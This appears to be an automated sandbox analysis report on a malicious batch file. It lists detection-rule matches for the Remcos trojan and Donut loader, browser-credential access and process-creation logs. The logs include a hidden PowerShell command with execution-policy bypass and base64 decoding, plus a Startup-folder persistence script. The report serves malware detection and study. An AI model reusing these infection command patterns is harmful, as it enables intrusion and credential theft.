              Source: 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1754524729.0000000005D0E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000002A.00000002.2381301082.0000000006468000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003F.00000002.3285696458.0000000005D49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000014.00000002.1753263642.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000004B.00000002.3916357239.0000000005E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000050.00000002.4155888640.0000000005A5D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000F.00000002.1616821481.0000000005D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003A.00000002.3015761795.0000000005C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.1787537306.000000000A471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000044.00000002.3628599649.00000000057AA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1909103811.0000000005F3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000050.00000002.4122586457.0000000005A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000F.00000002.1630733109.000000000B581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000035.00000002.2781991173.00000000060E9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000004B.00000002.3953316191.0000000005F3C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000019.00000002.1906868273.0000000005ED6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003A.00000002.3037691114.0000000005CF9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000003F.00000002.3306381438.0000000005DE9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.powershell.exe.8c10000.1.raw.unpack, qpjkq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 42.2.powershell.exe.6d05ce8.0.raw.unpack, qpjkq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winBAT@115/94@3/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\dwm.bat
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3708:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2844:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_km2czv1j.owr.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: powershell.exe, powershell.exe, 00000008.00000002.1524928935.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: powershell.exe, 00000007.00000002.1530245743.0000000003685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: powershell.exe, powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" "
